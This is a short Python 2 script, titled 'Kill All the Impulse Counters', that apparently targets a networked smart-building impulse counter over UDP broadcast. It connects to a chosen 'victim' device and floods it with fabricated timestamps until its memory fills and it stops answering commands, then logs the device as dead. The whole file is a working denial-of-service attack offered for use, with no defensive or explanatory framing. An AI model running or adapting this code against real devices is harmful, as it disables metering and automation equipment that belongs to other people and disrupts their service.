# -*- coding: utf-8 -*-
# Kill All the Impulse Counters !!!
#

"""basicly it will send fake dates to the impulse counter until 
it's full and doesnt respond to commands anymore"""

import datetime
import logging
from smartcloud import SmartCloudSend, SmartCloudRecive, Timeout
from SmartCloudDevices import ImpulseCounter

class Killer(object):
	"""Kill Impulse Counter"""
	def __init__(self, udp_broadcast_ip="192.168.10.255", victim=[1,75]):
		""" udp_broadcast_ip is address that is used for udp packet sending and
			reciving

			victim is a list with [subnet, devid] of device that is attacked
		"""

		# setup variables
		self.victim = victim

		# setup logging
		self.log = logger = logging.getLogger('ImpulseCounterKiller')
		logger.setLevel(logging.DEBUG)
		ch = logging.StreamHandler()
		ch.setLevel(logging.DEBUG)
		formatter = logging.Formatter('[%(levelname)s] %(message)s')
		ch.setFormatter(formatter)
		logger.addHandler(ch)

		self.log.info("Startup")

		# setup networking stuff
		self.log.debug("Starting Smart Cloud Sender")
		self.scs = SmartCloudSend(MyBroadcastIP=udp_broadcast_ip)
		self.log.debug("Starting Smart Cloud Reciver")
		self.scr = SmartCloudRecive(udp_broadcast_ip)
		self.scr.start()

	    #run the code
		self.log.info("Connecting to the device, sub:{}, id:{}".format(*victim))
		with ImpulseCounter(self.victim[1], self.victim[0],
											self.scs, self.scr) as device:
			self.attack(device)

	def attack(self, dev):
		"""attack device"""
		alive = dev.is_alive()
		self.log.info("Is device alive? {}".format(alive))
		if not alive:
			self.log.error("Device has to be alive to continue!")
			return

		raw_input("Press enter when ready")

		date = datetime.datetime.now()
		add_hour = datetime.timedelta(hours=1)
		while alive:
			for x in range(1,24):
				self.log.debug("Sending datetime: {}".format(date))
				dev.send_datetime(date)
				alive = dev.is_alive()
				date += add_hour
				self.log.debug("Is alive? {}".format(alive))
			try:
				print dev.get_counts(date,date) #that seems to break things
			except Timeout:
				alive = False
			else:
				alive = True
			self.log.debug("Is alive? {}".format(alive))
			
		self.log.info("Device is dead :)")


if __name__ == '__main__':
    Killer("192.168.10.255", victim=[1,75])  # run killer with that ip address
